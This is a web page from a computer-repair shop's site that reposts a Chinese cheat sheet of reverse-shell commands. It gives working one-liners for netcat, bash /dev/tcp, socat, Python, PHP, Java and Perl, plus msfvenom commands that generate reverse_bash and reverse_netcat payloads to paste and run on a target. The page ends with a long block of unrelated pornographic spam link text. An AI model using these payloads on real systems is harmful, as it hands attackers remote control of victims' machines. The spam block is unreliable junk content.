錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
反彈shell命令總結

作者: 佚名  日期:2023-07-13 17:19:21   來源: 本站整理

反彈shell命令總結

1.nc反彈

開啟本地8080端口監聽,并將本地的bash發布出去。
root# nc -lvvp 8080 -t -e /bin/bash
在這里插入圖片描述

連接目標主機
nc ip 端口
在這里插入圖片描述

2.bash直接反彈

kali監聽
在這里插入圖片描述
靶機運行:
root# bash -i >& /dev/tcp/ip/端口 0>&1
在這里插入圖片描述
bash命令解析:
在這里插入圖片描述
反彈成功
在這里插入圖片描述

3. socat反彈

kali監聽:socat tcp-listen:1234 -
在這里插入圖片描述
靶機運行:
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234
在這里插入圖片描述
反彈成功
在這里插入圖片描述

4.腳本反彈

4.1:python反彈

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

4.2:php反彈

php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' 

4.3:java反彈

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 |

while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() 

4.4:perl反彈

perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

.msf獲取反彈一句話

可以直接使用 msfvenom -l 結合關鍵字過濾(如cmd/unix/reverse),找出需要的各類反彈一句話payload的路徑信息。

# msfvenom -l payloads 'cmd/unix/reverse' 

發現msf支持反彈shell類型豐富。可以根據需求選擇。

在這里插入圖片描述
例如:生成bash的

# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
生成netcat

msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
靶機運行payload:
在這里插入圖片描述
成功反彈
在這里插入圖片描述



熱門文章
  • L1正則化和L2正則化
  • 在Linux系統下,可以使用以下方法和...
  • 主板型號怎么看?小編將給大家介紹...
  • win10在激活界面會提示無法訪問激活...
  • 360日歷怎么卸載?360日歷怎么徹底...
  • 墨魚丸是什么怎么卸載?墨魚丸視頻...
  • Win10打開壓縮文件提示安全警告的解...
  • Linux高頻常用指令匯總
  • 150個CMD命令(史上更全cmd命令 net...
  • 線性回歸算法
  • HTTPS和HTTP的主要區別
  • Oracle 炮轟、Ubuntu 看戲,紅帽被...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 13小箩利洗澡无码视频网站免费 | 久久亚洲精品无码av| 曰产无码久久久久久精品| 性无码免费一区二区三区在线| 无码超乳爆乳中文字幕久久| 国产精品JIZZ在线观看无码| 日韩丰满少妇无码内射| 成人免费无码精品国产电影| 国产精品无码av在线播放| 欧洲黑大粗无码免费| 2014AV天堂无码一区| 无码熟妇人妻AV在线影院| 无码囯产精品一区二区免费| 精品久久久久久中文字幕无码 | 中文字幕丰满乱子无码视频| 无套内射在线无码播放| 精品韩国亚洲av无码不卡区| 无码任你躁久久久久久| 国产做无码视频在线观看浪潮| 亚洲AV无码专区在线厂| 亚洲的天堂av无码| 白嫩少妇激情无码| 久久久久久精品无码人妻| 久久亚洲精品无码播放| 亚洲熟妇少妇任你躁在线观看无码| 中文无码热在线视频| 亚洲AV永久纯肉无码精品动漫| 久久中文字幕无码专区| 无码毛片内射白浆视频| 最新无码专区视频在线| 日日麻批免费40分钟无码| 日韩人妻无码精品一专区| 亚洲AV永久无码精品一百度影院| 狠狠躁狠狠爱免费视频无码| 最新亚洲人成无码网www电影| 久久久久久亚洲精品无码| 亚洲精品无码成人| 免费无码一区二区| 暴力强奷在线播放无码| 中文字幕无码久久人妻| 亚洲AV无码一区二区二三区软件 |